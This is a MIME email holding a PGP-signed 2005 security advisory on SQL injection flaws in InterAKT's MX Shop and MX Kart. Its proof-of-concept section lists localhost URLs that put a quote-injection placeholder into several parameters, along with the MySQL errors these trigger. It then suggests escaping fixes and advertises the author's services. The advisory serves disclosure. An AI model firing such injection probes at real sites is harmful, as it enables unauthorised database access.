This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C5364D.143F4680 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: MX Shop 1.1.1 and MX Kart 1.1.2 are vulnerable to multiple SQL = injection vulnerabilities Date: 1/04/2005 Vendor: InterAKT Vendor Website: http://www.interaktonline.com Summary: There are, mx shop 1.1.1 and mx kart 1.1.2 are vulnerable to = multiple sql injection vulnerabilities. Proof of Concept Exploits:=20 http://localhost/kartDemo/index.php?mod=3Dpages&idp=3D'SQL_INJECTION&PHPS= ESSID=3Db1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION' at line 1 http://localhost/MXShop/?mod=3Dcategory&id_ctg=3D'SQL_INJECTION&PHPSESSID= =3Db1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION OR id_prd=3D-1' at line 1 http://localhost/kartDemo/index.php?mod=3Dcategory&id_ctg=3D'SQL_INJECTIO= N&PHPSESSID=3Db1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION OR id_prd=3D-1' at line 1 http://localhost/kartDemo/index.php?PHPSESSID=3Db1267b894a93572928850920d= f08126d&id_man=3D'SQL_INJECTION&mod=3Dmanufacturer SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION AND visible_prd=3D1 ORDER BY name_prd ASC LIMIT 0 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database,=20 or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: = http://icis.digitalparadox.org/~dcrab/rss.php Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. Diabolic Crab's Security Services: Contact at = dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web = application securing services, along with programming in php, vb, asp, = c, c++, perl, java, html and graphic designing. For advertising on http://icis.digitalparadox.org/~dcrab or in these = advisories contact dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkw/dCZV5e8av/DUEQJ6rwCgya93TPMAsMbCMsDilndeyEmo3b4An0Zh 9QcLcuXpLWwMf2lAHXg4JBN1 =3D1yV9 -----END PGP SIGNATURE----- ------=_NextPart_000_0006_01C5364D.143F4680 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= /FONT>

Severity: Medium
Title: MX Shop = 1.1.1 and MX=20 Kart 1.1.2 are vulnerable to multiple SQL injection = vulnerabilities
Date:=20 1/04/2005

Vendor: InterAKT
Vendor Website: http://www.interaktonline.com<= BR>Summary:=20 There are, mx shop 1.1.1 and mx kart 1.1.2 are vulnerable to multiple = sql=20 injection vulnerabilities.

Proof of Concept Exploits:
http://localhos= t/kartDemo/index.php?mod=3Dpages&idp=3D'SQL_INJECTION&PHPSESSID=3D= b1267b894a93572928850920df08126d
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION' at line 1

http://localhost/MXS= hop/?mod=3Dcategory&id_ctg=3D'SQL_INJECTION&PHPSESSID=3Db1267b894= a93572928850920df08126d
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION OR id_prd=3D-1' at line 1

http://lo= calhost/kartDemo/index.php?mod=3Dcategory&id_ctg=3D'SQL_INJECTION&= ;PHPSESSID=3Db1267b894a93572928850920df08126d
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION OR id_prd=3D-1' at line 1

http:= //localhost/kartDemo/index.php?PHPSESSID=3Db1267b894a93572928850920df0812= 6d&id_man=3D'SQL_INJECTION&mod=3Dmanufacturer
SQL=20 INJECTION
You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near=20 '\'SQL_INJECTION AND visible_prd=3D1 ORDER BY name_prd ASC LIMIT = 0

Possible Fixes: The usage of htmlspeacialchars(), = mysql_escape_string(),=20 mysql_real_escape_string() and other functions for input validation = before=20 passing user input to the mysql database,
or before echoing data on = the=20 screen, would solve these problems.

Keep your self updated, Rss feed at: http://icis.digita= lparadox.org/~dcrab/rss.php

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come out book on Secure coding with php.

Diabolic Crab's Security Services: Contact at=20 dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20 application securing services, along with programming in php, vb, asp, = c, c++,=20 perl, java, html and graphic designing.

For advertising on http://icis.digitalparadox= .org/~dcrab=20 or in these advisories contact=20 dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com

iQA/AwUBQkw/dCZV5e8av/DUEQJ6rwCgya93TPMAsMbCMsDilndeyEmo3b4An0Zh
= 9QcLcuXpLWwMf2lAHXg4JBN1
=3D1yV9
-----END=20 PGP SIGNATURE-----

------=_NextPart_000_0006_01C5364D.143F4680--